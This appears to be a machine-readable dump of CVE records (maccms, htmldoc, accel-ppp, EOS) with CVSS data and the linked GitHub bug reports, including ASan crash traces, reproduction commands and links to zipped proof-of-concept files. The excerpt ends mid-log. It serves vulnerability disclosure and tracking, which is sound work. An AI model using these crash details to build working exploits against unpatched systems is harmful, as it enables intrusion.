"cpe:2.3:a:maccms:maccms:10.0:2020.1000.1022:*:*:*:*:*:*", "matchCriteriaId": "CCCB1037-E965-47D4-9751-DA6A5F0BE2C3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1023:*:*:*:*:*:*", "matchCriteriaId": "31266C07-3D1B-447B-B4C3-522141FBD997", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1024:*:*:*:*:*:*", "matchCriteriaId": "54F33D31-492C-4E7C-BFAA-6FFA33C68077", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1025:*:*:*:*:*:*", "matchCriteriaId": "A68DB873-896A-46BD-9529-86B1DDF43DD1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1027:*:*:*:*:*:*", "matchCriteriaId": "BC3B2EC0-A871-45F0-BC60-18533DCCE2D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1029:*:*:*:*:*:*", "matchCriteriaId": "4F11CCE5-47AA-4A49-B26F-09156323FFB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1031:*:*:*:*:*:*", "matchCriteriaId": "1B3E47B5-B415-41DF-B086-7F5BC981942B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1032:*:*:*:*:*:*", "matchCriteriaId": "6605114A-B1FB-4215-AA50-7A62F4A8D1B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1033:*:*:*:*:*:*", "matchCriteriaId": "961C529B-2C08-4BE4-9838-963A5A203771", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1034:*:*:*:*:*:*", "matchCriteriaId": "B1E7A1BA-7EC2-4A78-B7E4-CE8FB5C015F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1035:*:*:*:*:*:*", "matchCriteriaId": "3DD1921B-E5CB-4638-8B68-AF20A48D4BD0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1039:*:*:*:*:*:*", "matchCriteriaId": "CADE9341-E128-4F45-84F6-321E18506B85", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1042:*:*:*:*:*:*", "matchCriteriaId": "45653F81-D606-4BAB-8DF1-7C4F0B4F69D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1051:*:*:*:*:*:*", "matchCriteriaId": "B6CEEA9E-05DC-45D1-A06E-193D07179484", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1060:*:*:*:*:*:*", "matchCriteriaId": "08778CBC-2E9A-4A64-A830-371675779D4F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1062:*:*:*:*:*:*", "matchCriteriaId": "E81CB736-A871-4EC8-9E11-E143E1CAE954", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1068:*:*:*:*:*:*", "matchCriteriaId": "AD7042F2-467E-47AC-A8B0-86B2F5F2E5C7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1068b:*:*:*:*:*:*", "matchCriteriaId": "FEF5FCC4-9BEE-4282-BC60-E960C2502C4B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1069:*:*:*:*:*:*", "matchCriteriaId": "3EBB98B0-467C-4B8E-8D6B-BEBB2E8A64DD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1074:*:*:*:*:*:*", "matchCriteriaId": "8EFB8EDE-11AB-4E88-8AFC-742005658D08", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1075:*:*:*:*:*:*", "matchCriteriaId": "84BFCE9F-DA6D-46C9-98A0-08BBBDE81DDB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1080:*:*:*:*:*:*", "matchCriteriaId": "A702AE6F-44EB-4D58-B116-A4730E9E70D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1081:*:*:*:*:*:*", "matchCriteriaId": "DCA9C14A-4BEA-42FB-BCFF-F35309AE6832", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2021.1000.1081:*:*:*:*:*:*", "matchCriteriaId": "A7049FDA-9118-418C-9816-E2627C341D8F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.1099:*:*:*:*:*:*", "matchCriteriaId": "1E3AD4C3-5452-4A33-B426-B0CBF2D56EAD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3001:*:*:*:*:*:*", "matchCriteriaId": "6FF6ADDF-1480-4A46-938E-C17BD227BEAE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3002:*:*:*:*:*:*", "matchCriteriaId": "41E368B4-0B48-418B-923D-8368E3DC2372", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3004:*:*:*:*:*:*", "matchCriteriaId": "7CDE0C52-4110-4A3B-BDF4-09D860C0F96F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3005:*:*:*:*:*:*", "matchCriteriaId": "24CB165C-5EF3-4555-8907-80411877364D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3025:*:*:*:*:*:*", "matchCriteriaId": "23181A63-9B13-42CF-A557-46CC4170CA35", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/magicblack/maccms10/issues/746
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "magicblack", "maccms10" ]
网站后台添加视频处,包括名称、备注等参数位置均可插入xss代码 (There is a Storage XSS vulnerability in adding videos,XSS code can be inserted at parameter positions including name and remarks……) ![image](https://user-images.githubusercontent.com/37065209/141251731-da7148b1-efa0-406f-99f7-a2eb14e8175c.png) 插入的xss代码也会在前台被执行,它将影响访问该网站的所有用户 (The inserted XSS code will executed in the foreground,It will affect all users who visit the site) ![image](https://user-images.githubusercontent.com/37065209/141252001-98ad49f9-5743-4f82-a0d2-3a0e06c187a9.png) 虽然这个存储型xss位于后台,但该漏洞一旦被利用会导致前台众多用户都会收到攻击 另外,后台添加文章处也有相同问题
网站后台添加视频处存在存储型XSS漏洞(There is a cross-site scripting (XSS) vulnerability in adding videos)
https://api.github.com/repos/magicblack/maccms10/issues/746/comments
2
2021-11-11T07:08:11Z
2021-11-27T05:12:28Z
https://github.com/magicblack/maccms10/issues/746
1,050,645,219
746
3,357
CVE-2021-23158
2022-03-16T15:15:10.100
A flaw was found in htmldoc in v1.9.12. Double-free in function pspdf_export(),in ps-pdf.cxx may result in a write-what-where condition, allowing an attacker to execute arbitrary code and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967018" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/369b2ea1fd0d0537ba707f20a2f047b6afd2fbdc" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/414" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967018" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/369b2ea1fd0d0537ba707f20a2f047b6afd2fbdc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/414" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.12:*:*:*:*:*:*:*", "matchCriteriaId": "645554AD-DA7C-4B11-864A-89F423B08291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/michaelrsweet/htmldoc/issues/414
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a double-free in pspdf_export test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: htmldoc -f demo.pdf poc3.html poc(zipped for update): [poc3.zip](https://github.com/michaelrsweet/htmldoc/files/5872137/poc3.zip) ``` ==38152==ERROR: AddressSanitizer: attempting double-free on 0x603000000280 in thread T0: #0 0x4ee210 in free /home/goushi/work/libfuzzer-workshop/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124 #1 0x550309 in pspdf_export /home//htmldoc_sani/htmldoc/ps-pdf.cxx:945:7 #2 0x53c845 in main /home//htmldoc_sani/htmldoc/htmldoc.cxx:1291:3 #3 0x7ff67f7d10b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41f8bd in _start (/home//htmldoc_sani/htmldoc/htmldoc+0x41f8bd) 0x603000000280 is located 0 bytes inside of 18-byte region [0x603000000280,0x603000000292) freed by thread T0 here: #0 0x4ee210 in free /home/goushi/work/libfuzzer-workshop/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124 #1 0x550309 in pspdf_export /home//htmldoc_sani/htmldoc/ps-pdf.cxx:945:7 #2 0x53c845 in main /home//htmldoc_sani/htmldoc/htmldoc.cxx:1291:3 #3 0x7ff67f7d10b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x4ee5df in __interceptor_malloc /home/goushi/work/libfuzzer-workshop/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146 #1 0x5ab666 in htmlGetText /home//htmldoc_sani/htmldoc/htmllib.cxx:2125:23 SUMMARY: AddressSanitizer: double-free /home/goushi/work/libfuzzer-workshop/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124 in free ==38152==ABORTING ``` ``` gef➤ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff79ba859 in __GI_abort () at abort.c:79 #2 0x00007ffff7a253ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7b4f285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff7a2d47c in malloc_printerr (str=str@entry=0x7ffff7b51278 "malloc_consolidate(): invalid chunk size") at malloc.c:5347 #4 0x00007ffff7a2dc58 in malloc_consolidate (av=av@entry=0x7ffff7b80b80 <main_arena>) at malloc.c:4477 #5 0x00007ffff7a2f160 in _int_free (av=0x7ffff7b80b80 <main_arena>, p=0x9249a0, have_lock=<optimized out>) at malloc.c:4400 #6 0x00000000004138a4 in pspdf_export (document=<optimized out>, toc=<optimized out>) at ps-pdf.cxx:994 #7 0x0000000000408e89 in main (argc=<optimized out>, argv=<optimized out>) at htmldoc.cxx:1291 ``` reporter: chiba of topsec alphalab
AddressSanitizer: double-free in function pspdf_export ps-pdf.cxx:945:7
https://api.github.com/repos/michaelrsweet/htmldoc/issues/414/comments
3
2021-01-26T08:44:03Z
2022-06-09T02:03:19Z
https://github.com/michaelrsweet/htmldoc/issues/414
794,045,003
414
3,358
CVE-2021-23165
2022-03-16T15:15:10.157
A flaw was found in htmldoc before v1.9.12. Heap buffer overflow in pspdf_prepare_outpages(), in ps-pdf.cxx may lead to execute arbitrary code and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967014" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/6e8a95561988500b5b5ae4861b3b0cbf4fba517f" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/6e8a95561988500b5b5ae4861b3b0cbf4fba517f.patch" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/413" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967014" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/6e8a95561988500b5b5ae4861b3b0cbf4fba517f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/6e8a95561988500b5b5ae4861b3b0cbf4fba517f.patch" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/413" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "8D1CE1F4-17A1-430E-9C8B-0CE88A07514B", "versionEndExcluding": "1.9.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/michaelrsweet/htmldoc/issues/413
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a heap-buffer-overflow in the pspdf_prepare_outpages() ,in ps-pdf.cxx:1338:15 test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: ``` htmldoc -f demo.pdf poc2.html ``` poc(zipped for update): [poc2.zip](https://github.com/michaelrsweet/htmldoc/files/5872124/poc2.zip) ``` ================================================================= ==38089==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6150003b19f8 at pc 0x000000555985 bp 0x7ffca8f71990 sp 0x7ffca8f71988 WRITE of size 4 at 0x6150003b19f8 thread T0 #0 0x555984 in pspdf_prepare_outpages() /home//htmldoc_sani/htmldoc/ps-pdf.cxx:1338:15 #1 0x555984 in pspdf_export /home//htmldoc_sani/htmldoc/ps-pdf.cxx:901 #2 0x53c845 in main /home//htmldoc_sani/htmldoc/htmldoc.cxx:1291:3 #3 0x7f44ac7c40b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41f8bd in _start (/home//htmldoc_sani/htmldoc/htmldoc+0x41f8bd) 0x6150003b19f8 is located 0 bytes to the right of 504-byte region [0x6150003b1800,0x6150003b19f8) allocated by thread T0 here: #0 0x4ee5df in __interceptor_malloc /home/goushi/work/libfuzzer-workshop/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146 #1 0x5500bf in pspdf_prepare_outpages() /home//htmldoc_sani/htmldoc/ps-pdf.cxx:1258:27 #2 0x5500bf in pspdf_export /home//htmldoc_sani/htmldoc/ps-pdf.cxx:901 #3 0x53c845 in main /home//htmldoc_sani/htmldoc/htmldoc.cxx:1291:3 #4 0x7f44ac7c40b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home//htmldoc_sani/htmldoc/ps-pdf.cxx:1338:15 in pspdf_prepare_outpages() Shadow bytes around the buggy address: 0x0c2a8006e2e0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa 0x0c2a8006e2f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a8006e300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a8006e310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a8006e320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2a8006e330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa] 0x0c2a8006e340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a8006e350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a8006e360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a8006e370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a8006e380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==38089==ABORTING ``` reporter: chiba of topsec alphalab
AddressSanitizer: heap-buffer-overflow in pspdf_prepare_outpages() in ps-pdf.cxx:1338:15
https://api.github.com/repos/michaelrsweet/htmldoc/issues/413/comments
3
2021-01-26T08:39:00Z
2022-06-09T02:04:10Z
https://github.com/michaelrsweet/htmldoc/issues/413
794,041,949
413
3,359
CVE-2022-0982
2022-03-16T15:15:16.253
The telnet_input_char function in opt/src/accel-pppd/cli/telnet.c suffers from a memory corruption vulnerability, whereby user input cmdline_len is copied into a fixed buffer b->buf without any bound checks. If the server connects with a malicious client, crafted client requests can remotely trigger this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve_disclosure@tech.gov.sg", "tags": [ "Third Party Advisory" ], "url": "https://github.com/xebd/accel-ppp/issues/164" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/xebd/accel-ppp/issues/164" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:accel-ppp:accel-ppp:*:*:*:*:*:*:*:*", "matchCriteriaId": "CB0C5840-2CCB-4241-8AD3-F3A591D314AA", "versionEndExcluding": null, "versionEndIncluding": "1.12.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/xebd/accel-ppp/issues/164
[ "Third Party Advisory" ]
github.com
[ "xebd", "accel-ppp" ]
Dear accel-ppp Development Team, I have filed a vulnerability disclosure by email to dev@accel-ppp.org. Please let me know when it is patched and we can use this issue for tracking purposes. Thanks!
Vulnerability Disclosure
https://api.github.com/repos/xebd/accel-ppp/issues/164/comments
5
2022-01-04T06:09:13Z
2022-08-17T19:56:04Z
https://github.com/xebd/accel-ppp/issues/164
1,093,041,261
164
3,360
CVE-2022-26300
2022-03-17T00:15:07.857
EOS v2.1.0 was discovered to contain a heap-buffer-overflow via the function txn_test_gen_plugin.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/EOSIO/eos/issues/10820" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/EOSIO/eos/issues/10820" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eosio_project:eos:2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "635BF251-7282-44AE-9A48-59AA2C6B26DE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/EOSIO/eos/issues/10820
[ "Exploit", "Third Party Advisory" ]
github.com
[ "EOSIO", "eos" ]
**EOS:** 2.1.0 **Ubuntu:** 20.04 **Compiler:** llvm-7 clang-7 clang++-7 llvm-cov-7 ---- I want to use `txn_test_gen_plugin` to generate transactions, and the process is following the guidance: https://github.com/EOSIO/eos/blob/develop/plugins/txn_test_gen_plugin/README.md I have started the producer node (`eosio`) and non-producer node (`bp.a`), and deployed the bios contract. ``` $ cleos set contract eosio /root/eos-2.1.0/eos/build/contracts/contracts/eosio.bios/ eosio.bios.wasm eosio.bios.abi ``` Then, when I use the command to initialize the accounts txn_test_gen_plugin uses, **heap-buffer-overflow** happens: ``` $ curl --data-binary '["eosio", "5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3"]' http://127.0.0.1:8888/v1/txn_test_gen/create_test_accounts ``` Logs of eosio node: ``` info 2021-10-19T05:30:57.402 nodeos producer_plugin.cpp:2333 produce_block ] Produced block aa368708758ed956... #61 @ 2021-10-19T05:30:57.500 signed by eosio [trxs: 0, lib: 60, confirmed: 0] info 2021-10-19T05:30:57.594 net-0 net_plugin.cpp:3433 connection_monitor ] p2p client connections: 1/25, peer connections: 0/0 info 2021-10-19T05:30:57.902 nodeos producer_plugin.cpp:2333 produce_block ] Produced block eb95e9e4d0d8906e... #62 @ 2021-10-19T05:30:58.000 signed by eosio [trxs: 0, lib: 61, confirmed: 0] info 2021-10-19T05:30:58.401 nodeos producer_plugin.cpp:2333 produce_block ] Produced block a8db3c032b2ac8f6... #63 @ 2021-10-19T05:30:58.500 signed by eosio [trxs: 0, lib: 62, 